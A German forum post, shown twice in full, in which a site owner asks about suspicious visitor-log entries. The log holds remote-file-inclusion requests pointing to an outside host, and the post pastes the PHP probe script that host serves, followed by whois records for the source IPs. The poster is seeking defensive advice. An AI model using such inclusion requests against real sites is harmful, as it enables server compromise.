Hooter
17.09.2009, 19:48
Ich habe gerade in "Wer ist online" selsame Besuche bzw. Aufrufe gehabt.
Kennt das jemand?
Wollen die etwas installieren?
''>ZITAT</div>00:04:28 0 Guest 66.249.16.212 18:29:56 18:29:56 /
00:05:24 0 Guest 213.198.76.196 18:29:00 18:29:00 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:06:26 0 Guest 93.90.176.25 18:27:58 18:27:58 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:13:31 0 Guest 66.249.65.1 18:20:53 18:20:53 /index.php [/b]
Habe die Adresse mal aufgerufen, da steht dann folgendes:
<?
#####[ MCN ]#####
$os = @PHP_OS;
if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') {$mode = 'ON';} else {$mode = 'OFF';}
#####[ ECHO ]#####
echo 'MCN'.$mode.'';
echo '
MCN: '.$os.'
';
exit;
#####[ END ]#####
Sieht für mich etwas dubios aus!
Bei whois steht dazu folgendes:
''>ZITAT</div>
IP Information for 93.90.176.25
IP Location: Germany Germany Dortmund Dogado Internet Gmbh
Resolve Host: web21.dogado.de
IP Address: 93.90.176.25 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
SSL Cert: confixx SSL Certificate has expired.
Reverse IP: 166 other sites hosted on this server.
Blacklist Status: Clear
Whois Record
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 93.0.0.0 - 93.255.255.255
CIDR: 93.0.0.0/8
NetName: 93-RIPE
NetHandle: NET-93-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: SNS-PB.ISC.ORG
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS2.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois (http://anonym.to/?http://www.ripe.net/whois)
RegDate: 2007-03-27
Updated: 2009-05-18
== Additional Information From whois://whois.ripe.net:43 ==
inetnum: 93.90.176.0 - 93.90.183.255
netname: providerbox
descr: dogado Internet GmbH
country: DE
admin-c: PBH-RIPE
tech-c: PBH-RIPE
status: ASSIGNED PA
mnt-by: providerbox-mnt
source: RIPE # Filtered
role: provider.BOX Hostmaster
address: dogado Internet GmbH
address: Saarlandstrasse 25
address: D-44139 Dortmund
e-mail:
admin-c: RTD-RIPE
admin-c: TMD-RIPE
tech-c: RTD-RIPE
tech-c: TMD-RIPE
mnt-by: providerbox-mnt
nic-hdl: PBH-RIPE
source: RIPE # Filtered
route: 93.90.176.0/24
descr: dogado Internet GmbH
origin: AS45031
mnt-by: providerbox-mnt
source: RIPE # Filtered
[/b]
und noch
''>ZITAT</div>
IP Information for 213.198.76.196
IP Location: Germany Germany Frankfurt Verio De Frankfurt Facility
Resolve Host: eul0300330-pip.eu.verio.net
IP Address: 213.198.76.196 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
Blacklist Status: Clear
Whois Record
inetnum: 213.198.76.192 - 213.198.76.255
netname: VERIO-DE-INFRA
descr: VERIO DE frankfurt facility
country: DE
admin-c: VERA1-RIPE
tech-c: VIa6-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
remarks: Abuse/UCE:
remarks: Network:
remarks: Security issues:
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
role: Verio Europe Role Account
address: Verio UK
address: Devon House
address: 58 - 60 St. Katharine's Way, 1st Floor
address: London EW1 1LB
address: United Kingdom
phone: +44 20 7767 3700
fax-no: +44 20 7767 3701
remarks: trouble: network:
remarks: trouble: Abuse/UCE:
remarks: trouble: Security issues:
admin-c: VIa6-RIPE
tech-c: VIa6-RIPE
nic-hdl: VERA1-RIPE
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
abuse-mailbox:
role: Verio IP addressing
address: 8005 s. chester street
address: suite 200
address: englewood, CO 80112
address: United States
phone: +1 303 645-1900
remarks: trouble: Abuse/UCE:
remarks: trouble: Network:
remarks: trouble: Security issues:
admin-c: TG7672-RIPE
tech-c: TG7672-RIPE
tech-c: TF377-RIPE
tech-c: KP1186-RIPE
tech-c: LP508-RIPE
nic-hdl: VIa6-RIPE
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
abuse-mailbox:
[/b]
Wobei die obere Adresse wohl die gleiche ist wie "whois".
Kennt die jemand?
Grüße Daniel
Kennt das jemand?
Wollen die etwas installieren?
''>ZITAT</div>00:04:28 0 Guest 66.249.16.212 18:29:56 18:29:56 /
00:05:24 0 Guest 213.198.76.196 18:29:00 18:29:00 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:06:26 0 Guest 93.90.176.25 18:27:58 18:27:58 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:13:31 0 Guest 66.249.65.1 18:20:53 18:20:53 /index.php [/b]
Habe die Adresse mal aufgerufen, da steht dann folgendes:
<?
#####[ MCN ]#####
$os = @PHP_OS;
if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') {$mode = 'ON';} else {$mode = 'OFF';}
#####[ ECHO ]#####
echo 'MCN'.$mode.'';
echo '
MCN: '.$os.'
';
exit;
#####[ END ]#####
Sieht für mich etwas dubios aus!
Bei whois steht dazu folgendes:
''>ZITAT</div>
IP Information for 93.90.176.25
IP Location: Germany Germany Dortmund Dogado Internet Gmbh
Resolve Host: web21.dogado.de
IP Address: 93.90.176.25 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
SSL Cert: confixx SSL Certificate has expired.
Reverse IP: 166 other sites hosted on this server.
Blacklist Status: Clear
Whois Record
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 93.0.0.0 - 93.255.255.255
CIDR: 93.0.0.0/8
NetName: 93-RIPE
NetHandle: NET-93-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: SNS-PB.ISC.ORG
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS2.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois (http://anonym.to/?http://www.ripe.net/whois)
RegDate: 2007-03-27
Updated: 2009-05-18
== Additional Information From whois://whois.ripe.net:43 ==
inetnum: 93.90.176.0 - 93.90.183.255
netname: providerbox
descr: dogado Internet GmbH
country: DE
admin-c: PBH-RIPE
tech-c: PBH-RIPE
status: ASSIGNED PA
mnt-by: providerbox-mnt
source: RIPE # Filtered
role: provider.BOX Hostmaster
address: dogado Internet GmbH
address: Saarlandstrasse 25
address: D-44139 Dortmund
e-mail:
admin-c: RTD-RIPE
admin-c: TMD-RIPE
tech-c: RTD-RIPE
tech-c: TMD-RIPE
mnt-by: providerbox-mnt
nic-hdl: PBH-RIPE
source: RIPE # Filtered
route: 93.90.176.0/24
descr: dogado Internet GmbH
origin: AS45031
mnt-by: providerbox-mnt
source: RIPE # Filtered
[/b]
und noch
''>ZITAT</div>
IP Information for 213.198.76.196
IP Location: Germany Germany Frankfurt Verio De Frankfurt Facility
Resolve Host: eul0300330-pip.eu.verio.net
IP Address: 213.198.76.196 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
Blacklist Status: Clear
Whois Record
inetnum: 213.198.76.192 - 213.198.76.255
netname: VERIO-DE-INFRA
descr: VERIO DE frankfurt facility
country: DE
admin-c: VERA1-RIPE
tech-c: VIa6-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
remarks: Abuse/UCE:
remarks: Network:
remarks: Security issues:
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
role: Verio Europe Role Account
address: Verio UK
address: Devon House
address: 58 - 60 St. Katharine's Way, 1st Floor
address: London EW1 1LB
address: United Kingdom
phone: +44 20 7767 3700
fax-no: +44 20 7767 3701
remarks: trouble: network:
remarks: trouble: Abuse/UCE:
remarks: trouble: Security issues:
admin-c: VIa6-RIPE
tech-c: VIa6-RIPE
nic-hdl: VERA1-RIPE
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
abuse-mailbox:
role: Verio IP addressing
address: 8005 s. chester street
address: suite 200
address: englewood, CO 80112
address: United States
phone: +1 303 645-1900
remarks: trouble: Abuse/UCE:
remarks: trouble: Network:
remarks: trouble: Security issues:
admin-c: TG7672-RIPE
tech-c: TG7672-RIPE
tech-c: TF377-RIPE
tech-c: KP1186-RIPE
tech-c: LP508-RIPE
nic-hdl: VIa6-RIPE
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
abuse-mailbox:
[/b]
Wobei die obere Adresse wohl die gleiche ist wie "whois".
Kennt die jemand?
Grüße Daniel